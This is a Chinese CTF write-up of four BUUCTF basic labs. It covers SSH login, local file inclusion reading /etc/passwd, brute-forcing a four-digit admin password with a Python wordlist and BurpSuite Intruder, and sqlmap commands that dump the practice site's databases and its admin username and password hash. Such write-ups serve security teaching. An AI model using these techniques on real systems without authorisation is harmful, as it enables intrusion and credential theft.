BUUCTF：Basic 解析（一）

一、Linux Labs

打开靶场

F12 源代码啥也没有，但是题目给出了 ssh 连接的用户名密码端口号及主机，推测应该是要连接，打开 XShell 连接

设置用户名及密码

连接成功，随后找到 flag

二、BUU LFI COURSE 1

打开靶场

F12 检查源代码，没发现异常

看标题应该是本地文件包含漏洞，要求构造一个 GET 请求去尝试访问 flag

报错显示了路径，尝试访问 /etc/passwd

尝试访问 flag

三、BUU BRUTE 1

打开靶场

F12 检查源代码没发现异常，输入 admin 密码为 123 提交试试

报错提示密码为四位数字，那么大概率用户名是对的（这里换其他用户名的话会提示用户名错误）

生成字典开始爆破

# 导入模块
import itertools

# 生成密码组合
passwords = [''.join(i) for i in itertools.product('0123456789', repeat=4)]

# 保存到txt文件
with open('passwords.txt', 'w') as file:
    for password in passwords:
        file.write(password + '\n')

使用 BurpSuite 抓包，打开内嵌浏览器

开启拦截，然后将靶场的 URL 复制到内嵌浏览器中访问

成功抓到数据包

右键发送到 Intruder，选择密码参数添加 payload

点击上面的 payload，选择从文件中加载字典，点击开始攻击

若想提升速度可以在资源池中设置线程数

经过等待后点击下长度查看密码正确的数据包（原理是密码错误的数据包长度都是一样的）

将它右键发送到 repeater 模块

点击发送再点击页面渲染即可看到 flag

四、BUU SQL COURSE 1

打开靶场

F12 查看源代码没有发现注释

点击三个热点新闻发现都没有什么用

在调试器中发现了参数 id

猜测存在 SQL 注入，使用 SQLMap 发现 id 参数是可注入的

爆库

sqlmap -u "http://298a91c2-b73f-458a-b2bc-c2efb33b6953.node5.buuoj.cn:81/backend/content_detail.php?id=1" --dbs

[16:32:35] [INFO] retrieved: 'information_schema'
[16:32:35] [INFO] retrieved: 'ctftraining'
[16:32:35] [INFO] retrieved: 'mysql'
[16:32:35] [INFO] retrieved: 'performance_schema'
[16:32:35] [INFO] retrieved: 'test'
[16:32:35] [INFO] retrieved: 'news'

查看咱们当前在哪个数据库

sqlmap -u "http://298a91c2-b73f-458a-b2bc-c2efb33b6953.node5.buuoj.cn:81/backend/content_detail.php?id=1" --current-db 

current database: 'news'

爆出当前所在库的表

sqlmap -u "http://298a91c2-b73f-458a-b2bc-c2efb33b6953.node5.buuoj.cn:81/backend/content_detail.php?id=1" -D news --tables


Database: news                                                                                                              
[2 tables]
+----------+
| admin    |
| contents |
+----------+

爆表 admin

sqlmap -u "http://298a91c2-b73f-458a-b2bc-c2efb33b6953.node5.buuoj.cn:81/backend/content_detail.php?id=1" -D news -T admin --columns

Database: news                                                                                                              
Table: admin
[3 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| id       | int(11)      |
| password | varchar(128) |
| username | varchar(128) |
+----------+--------------+

爆 id,password,username 数据

sqlmap -u "http://298a91c2-b73f-458a-b2bc-c2efb33b6953.node5.buuoj.cn:81/backend/content_detail.php?id=1" -D news -T admin -C id,password,username --dump

Database: news
Table: admin
[1 entry]
+----+----------------------------------+----------+
| id | password                         | username |
+----+----------------------------------+----------+
| 1  | 1c2f234bcc0ef776e6a73c3ff4ab803f | admin    |
+----+----------------------------------+----------+

直接登录试试